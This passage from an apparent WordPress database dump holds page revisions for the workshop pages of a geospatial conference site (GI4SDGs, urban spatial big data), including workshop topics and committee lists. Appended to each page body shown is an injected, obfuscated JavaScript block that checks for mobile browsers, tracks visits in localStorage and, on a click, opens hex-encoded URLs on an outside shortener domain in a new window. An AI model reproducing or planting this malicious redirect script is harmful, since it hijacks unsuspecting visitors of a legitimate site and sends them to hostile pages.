_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-14 16:46:08','2022-10-14 16:46:08','',2768,'https://gsw2023.com/?p=2813',0,'revision','',0),
(2814,1,'2022-10-14 16:48:23','2022-10-14 16:48:23','','w123','','inherit','open','closed','','w123','','','2022-10-14 16:48:23','2022-10-14 16:48:23','',2810,'https://gsw2023.com/wp-content/uploads/2022/10/w123.jpg',0,'attachment','image/jpeg',0),
(2815,1,'2022-10-14 16:49:37','2022-10-14 16:49:37','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</h5>\n<h5 style=\"text-align:justify; color:black;\">Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</h5>\n<h5 style=\"text-align:justify; color:black;\">This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop will concentrate on the following topics:</strong></h5>\n<h6><strong>⦁ Opportunities and challenges of geospatial information-enabled SDGs;</strong></h6>\n<h6><strong>⦁ SDGs monitoring examples with geospatial perspective;</strong></h6>\n<h6><strong>⦁ Definition and modeling of geospatial essential variables for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Algorithms and methods for deriving geospatial essential variables, e.g., machine learning, big data analytics, cloud computing and other technologies;</strong></h6>\n<h6><strong>⦁ Global mapping initiatives and progresses at national and international levels;</strong></h6>\n<h6><strong>⦁ Integrating crowd-sourced data and VGI with geospatial data for SDGs monitoring;</strong></h6>\n<h6><strong>⦁ Developments and applications of geospatial knowledge service and collaborative platforms to meet SDGs assessment and monitoring;</strong></h6>\n<h6><strong>⦁ Ethical use of geospatial data and SDGs</strong></h6>\n<h6><strong>⦁ Other related topics.</strong></h6>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>The workshop plans to have the following four technical sessions:</strong></h5>\n<h6><strong>⦁ Session 1: Assessing SDGs progress by integrating geospatial and statistical information</strong></h6>\n<h6><strong>⦁ Session 2: Extracting Geospatial Information for SDGs</strong></h6>\n<h6><strong>⦁ Session 3: Monitoring SDGs with geospatially essential variables</strong></h6>\n<h6><strong>⦁ Session 4: ISPRS Scientific Program GI4SDGs: Progress and Collaboration</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>Workshop Chairs</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee</strong></h5>\n<p>⦁ Yifang Ban, KTH Royal Institute of Technology, Sweden<br />\n⦁ Maria Antonia Brovelli, Politecnico di Milano, Italy<br />\n⦁ Silvana Philippi Camboin, Universidade Federal do Paraná: Curitiba, Brazil<br />\n⦁ Jun Chen, National Geomatics Center of China, China<br />\n⦁ Laurent Durieux, GEO secretariat, France<br />\n⦁ Hongchao Fan, Norwegian University of Science and Technology, Germany<br />\n⦁ Gregory Giuliani, University of Geneva, Geneva, Switzerland<br />\n⦁ Songnian Li, Toronto Metropolitan University, Canada<br />\n⦁ Marguerite Madden, University of Georgia, USA<br />\n⦁ Lucy W. Mburu, College of Technology, KCA University, Kenya<br />\n⦁ Terje Midtbø, Norwegian University of Science and Technology, Norway<br />\n⦁ Jon Mills, Newcastle University, UK<br />\n⦁ Petros Patias, Aristotle University, Greece<br />\n⦁ Daniele Oxoli, Politecnico di Milano<br />\n⦁ Shu Peng, National Geomatics Center of China, China<br />\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\n⦁ Hao Wu, National Geomatics Center of China, China<br />\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-14 16:49:37','2022-10-14 16:49:37','',2768,'https://gsw2023.com/?p=2815',0,'revision','',0),
(2816,1,'2022-10-14 16:57:00','2022-10-14 16:57:00','','m2','','inherit','open','closed','','m2-2','','','2022-10-14 16:57:00','2022-10-14 16:57:00','',2791,'https://gsw2023.com/wp-content/uploads/2022/10/m2-1.jpg',0,'attachment','image/jpeg',0),
(2817,1,'2022-10-14 17:03:06','2022-10-14 17:03:06','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'